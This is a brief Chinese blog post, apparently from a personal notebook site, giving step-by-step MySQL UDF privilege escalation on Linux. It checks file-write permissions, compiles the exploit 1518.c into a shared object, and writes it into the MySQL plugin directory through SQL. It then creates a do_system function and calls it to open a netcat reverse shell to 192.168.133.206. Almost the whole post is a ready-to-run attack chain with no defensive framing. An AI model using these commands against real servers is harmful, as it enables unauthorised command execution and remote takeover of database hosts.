MYSQL提权(LINUX)

2021-01-28  本文已影响0人  __周__

select @@global.secure_file_priv;
查看MySQL服务器的文件读写权限
如果是NULL就是完全禁止

udf提权用到的so文件(linux)在kali下默认集成,路径为/usr/share/sqlmap/udf/mysql/linux/64(32)

图片.png

或者searchsploit mysql udf

图片.png

把对应的内容编译出来

gcc -g -c 1518.c
gcc -g -shared -o  1518.so 1518.o -lc

mysql创建函数命令

use mysql;
show variables like '%plugin%';
create table udf1(line blob);
insert into udf1 values(load_file('/tmp/udf.so'));
select * from udf1 into dumpfile '/usr/lib/mysql/plugin/udf.so';
create function do_system returns integer soname 'udf.so';
select * from mysql.func; #查询是否创建函数成功
select do_system('nc 192.168.133.206 9999 -e /bin/bash');
上一篇下一篇

猜你喜欢

热点阅读